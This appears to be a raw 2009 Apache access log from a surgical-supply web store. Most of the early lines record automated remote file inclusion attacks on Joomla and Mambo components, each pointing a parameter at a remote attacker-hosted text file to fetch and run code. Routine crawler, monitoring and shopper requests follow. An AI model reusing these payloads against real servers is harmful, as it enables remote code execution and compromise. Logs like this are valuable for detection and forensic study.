110.45.144.106 - - [20/May/2009:05:28:40 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:28:40 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:28:45 -0400] "GET /logs/access_log.Q109040700///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:28:45 -0400] "GET /logs/access_log.Q109051100///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:28:45 -0400] "GET /logs/access_log.Q109040700///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:28:45 -0400] "GET /logs/access_log.Q109051100///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
118.45.190.166 - - [20/May/2009:05:28:53 -0400] "GET /logs/access_log.Q109050300//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
200.123.152.51 - - [20/May/2009:05:28:57 -0400] "GET /logs/error_log.Q108051600/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.buttecreekcanyon.net/History/31337.txt? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
110.45.144.106 - - [20/May/2009:05:29:16 -0400] "GET /logs/access_log.Q109040700%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:29:21 -0400] "GET /logs/access_log.Q109051100%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:30:19 -0400] "GET /logs/access_log.Q109040700%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:30:25 -0400] "GET /logs/access_log.Q109051100%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:30:45 -0400] "GET /logs/access_log.Q109040700%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:30:45 -0400] "GET /logs/access_log.Q109051100%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
91.121.210.42 - - [20/May/2009:05:31:01 -0400] "GET /logs/access_log.Q109030200//admin/ST_platforms.php?include_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
91.121.210.42 - - [20/May/2009:05:31:01 -0400] "GET /logs/access_log.Q108102900//admin/ST_platforms.php?include_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
91.121.210.42 - - [20/May/2009:05:31:01 -0400] "GET //admin/ST_platforms.php?include_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
91.121.210.42 - - [20/May/2009:05:31:01 -0400] "GET /logs//admin/ST_platforms.php?include_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
121.165.73.157 - - [20/May/2009:05:31:31 -0400] "GET /logs/access_log.Q109051200/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
121.165.73.157 - - [20/May/2009:05:31:31 -0400] "GET /logs/access_log.Q109050700/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
91.121.210.42 - - [20/May/2009:05:31:38 -0400] "GET //admin/ST_platforms.php?include_path=http://www.e-blacklist.net/alditor/bin1.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
91.121.210.42 - - [20/May/2009:05:31:38 -0400] "GET /logs//admin/ST_platforms.php?include_path=http://www.e-blacklist.net/alditor/bin1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
91.121.210.42 - - [20/May/2009:05:31:38 -0400] "GET /logs/access_log.Q108102900//admin/ST_platforms.php?include_path=http://www.e-blacklist.net/alditor/bin1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
91.121.210.42 - - [20/May/2009:05:31:38 -0400] "GET /logs/access_log.Q109030200//admin/ST_platforms.php?include_path=http://www.e-blacklist.net/alditor/bin1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
66.249.72.114 - - [20/May/2009:05:31:39 -0400] "GET /images/nav04_products_off.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
81.84.50.71 - - [20/May/2009:05:31:49 -0400] "GET /cgi-bin/favicon.ico HTTP/1.1" 404 217 "-" "Mozilla/4.0 (compatible; GoogleToolbar 6.1.1518.856; Windows 6.0; MSIE 7.0.6001.18000)"
168.143.19.89 - - [20/May/2009:05:32:33 -0400] "GET /logs/error_log.Q109050400/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://10thplanet.com/playlist/scan/httpd.txt? HTTP/1.1" 404 273 "-" "libwww-perl/5.825"
168.143.19.89 - - [20/May/2009:05:32:33 -0400] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://10thplanet.com/playlist/scan/httpd.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.825"
168.143.19.89 - - [20/May/2009:05:32:33 -0400] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://10thplanet.com/playlist/scan/httpd.txt? HTTP/1.1" 404 252 "-" "libwww-perl/5.825"
91.121.210.42 - - [20/May/2009:05:32:41 -0400] "GET /logs/access_log.Q108102900%20%20//admin/ST_platforms.php?include_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
91.121.210.42 - - [20/May/2009:05:32:41 -0400] "GET /logs/access_log.Q109030200%20%20//admin/ST_platforms.php?include_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
91.121.210.42 - - [20/May/2009:05:32:55 -0400] "GET /logs/access_log.Q108102900%20%20//admin/ST_platforms.php?include_path=http://www.e-blacklist.net/alditor/bin1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
91.121.210.42 - - [20/May/2009:05:32:55 -0400] "GET /logs/access_log.Q109030200%20%20//admin/ST_platforms.php?include_path=http://www.e-blacklist.net/alditor/bin1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
209.59.12.99 - - [20/May/2009:05:33:27 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
168.143.19.89 - - [20/May/2009:05:33:48 -0400] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://10thplanet.com/playlist/scan/httpd.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.825"
91.121.210.42 - - [20/May/2009:05:34:34 -0400] "GET /logs/access_log.Q108071500//admin/ST_platforms.php?include_path=http://www.e-blacklist.net/alditor/bin1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
91.121.210.42 - - [20/May/2009:05:34:34 -0400] "GET /logs/access_log.Q108052400//admin/ST_platforms.php?include_path=http://www.e-blacklist.net/alditor/bin1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
91.121.210.42 - - [20/May/2009:05:34:53 -0400] "GET /logs/access_log.Q108052400//admin/ST_platforms.php?include_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
91.121.210.42 - - [20/May/2009:05:34:53 -0400] "GET /logs/access_log.Q108071500//admin/ST_platforms.php?include_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
88.84.128.40 - - [20/May/2009:05:35:17 -0400] "GET /logs/access_log.Q108052400//?page=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
88.84.128.40 - - [20/May/2009:05:35:17 -0400] "GET //?page=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.803"
88.84.128.40 - - [20/May/2009:05:35:17 -0400] "GET /logs//?page=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 2093 "-" "libwww-perl/5.803"
87.106.135.14 - - [20/May/2009:05:35:23 -0400] "GET /logs/access_log.Q108052400//?page=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
87.106.135.14 - - [20/May/2009:05:35:24 -0400] "GET //?page=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
87.106.135.14 - - [20/May/2009:05:35:24 -0400] "GET /logs//?page=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 200 2093 "-" "libwww-perl/5.805"
72.30.142.171 - - [20/May/2009:05:38:01 -0400] "GET /logs/access_log.Q107051600 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [20/May/2009:05:38:27 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
110.45.144.106 - - [20/May/2009:05:38:43 -0400] "GET /logs/access_log.Q108090100//include/write.php?dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:38:43 -0400] "GET /logs/access_log.Q108102400//include/write.php?dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:38:44 -0400] "GET /logs/access_log.Q108090100//include/write.php?dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:38:51 -0400] "GET /logs/access_log.Q108102400//include/write.php?dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:39:01 -0400] "GET /logs/access_log.Q108090100//include/write.php?dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:05:39:08 -0400] "GET /logs/access_log.Q108102400//include/write.php?dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
202.53.250.98 - - [20/May/2009:05:39:57 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
202.53.250.98 - - [20/May/2009:05:40:11 -0400] "GET /logs/access_log.Q108090200//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
202.53.250.98 - - [20/May/2009:05:40:11 -0400] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
66.249.72.114 - - [20/May/2009:05:40:17 -0400] "GET /images/over-index19_ekgsuppl.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
110.45.144.107 - - [20/May/2009:05:40:26 -0400] "GET /logs/access_log.Q108052200/?sourcedir=http://www.fabricnara.com/pma/libraries/id.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
202.53.250.98 - - [20/May/2009:05:40:58 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.169.189.112 - - [20/May/2009:05:42:22 -0400] "GET / HTTP/1.1" 200 409 "http://www.google.com/url?sa=D&q=http://www.aceonlinestore.com/&usg=AFQjCNH-ZPTY-d1LC2dX_35i0Y0JFJnAkA" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [20/May/2009:05:42:23 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [20/May/2009:05:42:24 -0400] "GET /index.htm HTTP/1.1" 200 870 "http://www.aceonlinestore.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [20/May/2009:05:42:25 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):92092_________________________ HTTP/1.1" 200 76103 "http://www.aceonlinestore.com/index.htm" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [20/May/2009:05:42:34 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):92092_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [20/May/2009:05:42:34 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):92092_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [20/May/2009:05:42:34 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):92092_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [20/May/2009:05:42:35 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):92092_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [20/May/2009:05:42:35 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):92092_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [20/May/2009:05:42:35 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):92092_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [20/May/2009:05:42:35 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):92092_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [20/May/2009:05:42:35 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):92092_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [20/May/2009:05:42:35 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):92092_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [20/May/2009:05:42:35 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):92092_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [20/May/2009:05:42:35 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):92092_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [20/May/2009:05:42:35 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):92092_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [20/May/2009:05:42:35 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):92092_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [20/May/2009:05:42:35 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):92092_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [20/May/2009:05:42:35 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):92092_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [20/May/2009:05:42:35 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):92092_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [20/May/2009:05:42:36 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):92092_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [20/May/2009:05:42:36 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):92092_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [20/May/2009:05:42:36 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):92092_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [20/May/2009:05:42:36 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):92092_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [20/May/2009:05:42:36 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):92092_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [20/May/2009:05:42:36 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):92092_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [20/May/2009:05:42:36 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):92092_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [20/May/2009:05:42:36 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):92092_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [20/May/2009:05:42:36 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):92092_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [20/May/2009:05:42:36 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):92092_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [20/May/2009:05:42:36 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):92092_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [20/May/2009:05:42:36 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):92092_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [20/May/2009:05:42:36 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):92092_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [20/May/2009:05:42:43 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L000504444B119100306D053+M37+ENG HTTP/1.1" 200 37508 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):92092_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [20/May/2009:05:42:46 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000504444B119100306D053+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
